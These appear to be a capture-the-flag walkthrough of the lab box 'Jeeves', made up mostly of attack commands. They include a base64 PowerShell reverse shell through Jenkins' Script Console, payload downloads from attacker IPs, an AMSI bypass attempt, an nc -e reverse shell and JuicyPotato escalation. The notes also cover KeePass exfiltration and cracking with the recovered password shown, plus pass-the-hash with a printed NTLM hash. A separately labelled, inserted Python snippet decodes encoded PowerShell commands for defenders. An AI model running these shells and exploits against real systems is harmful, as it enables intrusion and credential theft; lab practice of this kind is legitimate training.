Jeeves

RCE via Script Console

sudo rlwrap -cAr nc -lvnp 4444

Revshells > PowerShell base64

println "powershell.exe -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANAAiACwANAA0ADQANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=".execute().text
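The command above runs PowerShell with `-e`, so the script only appears in process logs as a UTF-16LE base64 blob. The following is an added defender-side example (not part of the original notes) that decodes such `-EncodedCommand` arguments from constructed sample command lines and flags tokens worth an analyst's look; the token list is an assumption for the example, not a complete signature set.

```python
import base64
from typing import List, Optional, Tuple

# Tokens that usually merit review when they appear in a decoded payload.
# Assumed for this example; not an exhaustive detection signature.
SUSPICIOUS_TOKENS = ("TCPClient", "GetStream", "iex", "Invoke-Expression",
                     "DownloadString", "FromBase64String")

def encoded_command_payload(cmdline: str) -> Optional[str]:
    """Return the base64 argument following an -EncodedCommand style flag, or None.

    PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
    so this is a prefix match; -ex (ExecutionPolicy) or -NoP do not match.
    """
    parts = cmdline.split()
    for i, tok in enumerate(parts[:-1]):
        if tok[:1] in "-/" and len(tok) > 1:
            if "-encodedcommand".startswith("-" + tok[1:].lower()):
                return parts[i + 1].strip("\"'")
    return None

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode the script from a `powershell -e <b64>` command line (UTF-16LE), or None."""
    b64 = encoded_command_payload(cmdline)
    if b64 is None:
        return None
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not a valid encoded command; leave for manual review

def flag_tokens(script: str) -> List[str]:
    low = script.lower()
    return [t for t in SUSPICIOUS_TOKENS if t.lower() in low]

def review(lines: List[str]) -> List[Tuple[int, str, List[str]]]:
    """Return (line_no, decoded_script, hits) for each line carrying an encoded command."""
    out = []
    for n, line in enumerate(lines, 1):
        script = decode_encoded_command(line)
        if script is not None:
            out.append((n, script, flag_tokens(script)))
    return out

# Constructed sample: a harmless script encoded exactly as the -e flag expects.
SAMPLE_SCRIPT = "$data = 'constructed sample'; iex $data"
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_LOG = [
    "CommandLine: java.exe -jar jenkins.war",
    f"CommandLine: powershell.exe -NoP -e {SAMPLE_B64}",
    "CommandLine: powershell.exe -ExecutionPolicy Bypass -File C:\\tmp\\x.ps1",
]

if __name__ == "__main__":
    for n, script, hits in review(SAMPLE_LOG):
        print(f"line {n}: hits={hits}\n  {script}")
```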

With certutil it does not work:

Invoke-WebRequest "http://10.10.14.4/godpotato.exe" -OutFile godpotato.exe

Nor with Invoke-WebRequest; it seems to be the antivirus, so we go for an AMSI bypass:

[SYStEM.TEXT.EncodInG]::UniCOdE.getsTRiNgFRoMbasE64stRinG("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")|iex

That does not seem to work either, so we try Juicy Potato:

dir /r
more < hm.txt:root.txt
powershell -c Invoke-WebRequest -Uri "http://10.10.14.103:8000/nc.exe" -OutFile nc.exe
powershell -c Invoke-WebRequest -Uri "http://10.10.14.103:8000/JuicyPotato.exe" -OutFile JuicyPotato.exe
powershell -c Invoke-WebRequest -Uri "http://10.10.14.103:8000/rshell.bat" -OutFile rshell.bat

rshell.bat

C:\Users\kohsuke\AppData\Local\Temp\pentesting\nc.exe -e powershell.exe 10.10.14.4 3333
sudo rlwrap -cAr nc -lvnp 3333
./jpotato.exe -p ./rshell.bat -l 3333 -t * -c "{e60687f7-01a1-40aa-86ac-db1cbf673334}"

Otherwise use another CLSID:

juicy-potato/CLSID at master · ohpe/juicy-potato · GitHub


In Documents there is:

CEH.kdbx

To transfer it we use base64:

[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Users\kohsuke\Documents\CEH.kdbx"))
keepass2john CEH.kdbx > CEH.kdbx.hash
john CEH.kdbx.hash --wordlist=/usr/share/wordlists/rockyou.txt
moonshine1
netexec smb 10.10.10.63 -u 'Administrator' -H 'e0fb1fb85756c24235ff238cbe81fe00'

With psexec:

impacket-psexec JEEVES/Administrator@JEEVES -hashes 'aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00' -dc-ip 10.10.10.63